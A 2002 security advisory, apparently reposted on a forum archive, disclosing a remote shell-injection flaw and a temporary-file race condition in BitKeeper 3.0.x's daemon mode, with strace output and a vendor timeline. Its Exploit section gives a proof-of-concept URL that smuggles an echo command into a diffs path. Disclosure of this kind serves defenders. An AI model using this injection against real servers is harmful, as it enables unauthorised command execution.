PDA

Bekijk Volledige Versie : BitKeeper remote shell command execution/local vulnerability



Maurycy Prodeus
16/01/03, 01:37
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


Synopsis: BitKeeper remote shell command execution/local vulnerability
Product: BitKeeper (http://www.bitkeeper.com)
Version: 3.0.x
Author: Maurycy Prodeus <z33d@isec.pl>
Date: 11 November 2002

Issue:
- ------

BitKeeper is a source management software. It contains a shell argument
parsing vulnerability that leads remote attacker to run arbitrary
shell commands on system where BitKeeper listens to HTTP requests.


Details:
- --------

1. Remote command execution

BitKeeper may be executed in daemon mode then it opens port and listens
to incoming requests. BitKeeper provides remote users with access
to project resources through web interface. It calls external diff binary
as a parameter to shell -c option which is susceptible to shell
metacharacter injection.

2. Locally exploitable race condition

Second vulnerability is in temporary file handling also during calling
external programs.

Piece of strace output:

20495 getpid() = 20495
20495 lstat("/tmp/foo.c-1.1-20495", 0xbfffae9c) = -1 ENOENT (No such file or directory)
20495 lstat("/tmp", {st_mode=S_IFDIR|S_ISVTX|0777, st_size=16384, ...}) = 0
20495 open("/tmp/foo.c-1.1-20495", O_WRONLY|O_CREAT|O_TRUNC, 0666) = 8

There is race condition vulnerability after BitKeeper stats the file and
before the file is opened. Additionally it is created with insecure
priviledges.

Impact:
- -------

If BitKeeper is running in daemon mode and listens to incoming requests,
remote attacker can execute arbitrary commands on system with its
priviledges. Local attacker can additionaly get access to temporary files
which may cause taken over control of the program.


Vendor Status:
- --------------

November 12, 2002 Vendor has been contacted
November 12, 2002 First answer
November 27, 2002 Information about pre-release
December 10, 2002 Last email

While coordinating date of publishing this advisory, they stop responding to
my emails.

Exploit:
- --------

If BitKeeper is run as stand-alone daemon, link:

http://somehost.com:port/
diffs/foo.c@%27;echo%20%3Eiwashere%27?nav=index.html|src/|hist/foo.c

should create file named "iwashere" in project root directory.


- --
Maurycy Prodeus
iSEC Security Research
http://isec.pl/

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (GNU/Linux)

iD8DBQE+IBbnC+8U3Z5wpu4RAkM6AKDEeTh1akZ5TfdWkvw2xa HBkgXIRwCglXYQ
sjzfB4azJzMu7wJTScSllvg=
=O+nl
-----END PGP SIGNATURE-----